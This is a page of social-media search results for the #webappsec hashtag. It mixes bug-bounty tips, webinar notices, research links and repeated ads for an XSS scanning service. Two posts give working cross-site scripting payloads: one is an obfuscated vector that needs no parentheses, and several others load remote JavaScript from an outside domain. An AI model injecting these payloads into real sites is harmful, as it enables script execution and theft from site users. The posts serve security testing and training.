#webappsec search results
🚀 Day 2 of 30: 🛠 - Identify Target Subdomains! Start with tools like - Facebook certificate transparency - Google certificate transparency - Findomain - subjack etc. 🔍 These tools save you time by gathering data from multiple sources. #WebAppSec #bugbountytips #bugbounty…

When going for Blind #XSS attempts, it's better to use a polyglot since we don't know the context of the injection in advance. Just saying. 😎 #WebAppSec #BugBounty #PenTesting

⚡ Webinar — Next.js Middleware Bypass & How to Detect It 📅 29 Sept 2025 | 🕘 9–10 PM 🎤 Speaker: @takeptoto 🔗 meet.google.com/tza-umrb-you #CyberSecurity #Nextjs #WebAppSec #CTF #Webinar

What would you like to see about #XSS here? 🤔 Let us know in the comments! #WebAppSec #BugBounty #PenTesting
Mind the Headers: HTTP Security Headers (X-Frame-Options, X-Content-Type-Options, etc.) are crucial for defending against various attacks. Ensure your web app is fortified! #WebAppSec

Don't Underestimate HTTP Desync Attacks! HTTP Request Smuggling can lead to cache poisoning, XSS, and more. Make sure you know how to handle such vulnerabilities to keep your applications safe! #CyberSecurity #WebAppSec

Today, I have a great resource reminder - which I have shared before - that I believe will be very useful for those who are improving themselves in the field of Web Application Security❗️🤓 Don't forget to add it to your bookmarks.🌸 Link: media.licdn.com/dms/document/m… #webappsec

Here's my research about Python dirty Arbitrary File Write to RCE via overwriting shared object files or overwriting bytecode files. Enjoy! siunam321.github.io/research/pytho… #Research #WebAppSec
According to my VM update this morning @zaproxy 2.16.0 is now available on @kalilinux #DAST #PenTest #WebAppSec #AppSec #RedTeam #PurpleTeam

Here's my attempted research in PHP class pollution! Although I couldn't escape the object context and pollute other classes, it's still interesting that we can pollute the object's attributes and associative array's keys. siunam321.github.io/research/attem… #Research #WebAppSec
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting

Stay one step ahead of attackers by discovering essential best practices to secure your web applications and protect sensitive data. #CyberSecurity #WebAppSec #OWASP #cybersecurityawareness
Talking about #SSRF, I just got an idea to add SSRF-based #XSS to @KN0X55 ! It's coming in the update next week most probably. #WebAppSec #BugBounty #PenTesting

XSS Without Parentheses location=tagName <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> PoC: x55.is/brutelogic/gym… knoxss.pro - #XSS made easy. Try it now! #WebAppSec #PenTesting #BugBounty

🔟 Server-Side Request Forgery (SSRF) ➡️ Attackers trick servers into making malicious requests. 🔑 Validate URLs, restrict network access, use allowlists. #SSRF #WebAppSec
Upload forms seem basic but are potential goldmines for attackers. The Upload Vulnerabilities room on @RealTryHackMe showed how easily malicious files bypass basic filters. A simple profile picture turning into remote code execution was mind-blowing. #UploadVulns #WebAppSec #RCE

🏆 KNOXSS September 2025 Giveaway 🏆 ➡️ Follow, like and share! 😍 ➡️ 1 Month Pro access for 3 winners on Friday 5th Good luck! 🤞 Check what only KNOXSS can find for you: knoxss.pro/?page_id=766 knoxss.pro - try it now! #WebAppSec #BugBounty #PenTesting
Improve your #XSS PoCs w/ a remote call to our X55.is domain! ➡️ Replacing alert(1) '-import('//X55.is')-' <Svg OnLoad=import('//X55.is')> ➡️ As href/src attribute <Base Href=//X55.is> <Script Src=//X55.is> ➡️ Jumping to # for custom JS x55.is/brutelogic/gym…
x55.is
XSS Gym - Train your XSS Muscles
More than 30 different XSS cases to play with, show and share XSS Proofs-of-Concept (PoCs).

🛠️ Webinar — Writing Your First Burp Extension 📅 28 Aug 2025 | 🕘 9–10 PM 🎤 Speaker: Marcus (a.k.a benkyou) 🔗 Join: linkedin.com/feed/update/ur… #CyberSecurity #BurpSuite #WebAppSec #CTF #Webinar

7/7 Security is about layers, not just a single pattern-matching rule. What are your go-to methods for bypassing filtered SSTI? #SSTI #BugBountyTips #WebAppSec #CyberSecurity #RedTeam
⚠️ Stop Web Cache Deception in React.js: attackers exploit fake .css/.js paths. Learn Cache-Control, Vary, Next.js middleware, service workers, tests—with code. #ReactJS #CyberSecurity #WebAppSec #Nextjs #InfoSec cybersrely.com/web-cache-dece…
The 1-month plan is back! 😎 Billed just once, no recurring charges. It's perfect for you that want to try KNOXSS for the 1st time. Sign up and/or upgrade your existing account. knoxss.pro - #XSS made easy. #WebAppSec #BugBounty #PenTesting

The 1-month plan is back! 😎 Billed just once, no recurring charges. It's perfect for you that want to try KNOXSS for the 1st time. Sign up and/or upgrade your existing account. knoxss.pro #WebAppSec #BugBounty #PenTesting

Courtesy of @psiinon a performance fix for @zaproxy Auth Helper was released earlier today. #AppSec #WebAppSec #DevSecOps #DAST

There are several ways to test for #XSS that can be done manually but it is time expensive and very prone to be forgotten in a proper security assessment. Try knoxss.me #WebAppSec #PenTesting #BugBounty

🔍 How to crush it in bug hunting and web application pentesting effectively! Uncover vulnerabilities, master recon techniques, and level up your security skills. 🚀 🔗vivekpentest.com/2024/06/Bug%20… #BugBounty #WebAppSec #Pentesting #CyberSecurity #EthicalHacking #InfoSec #bugbounty
Get serious about #XSS! Sign up or upgrade. knoxss.pro - built for pros. #WebAppSec #BugBounty #Pentesting
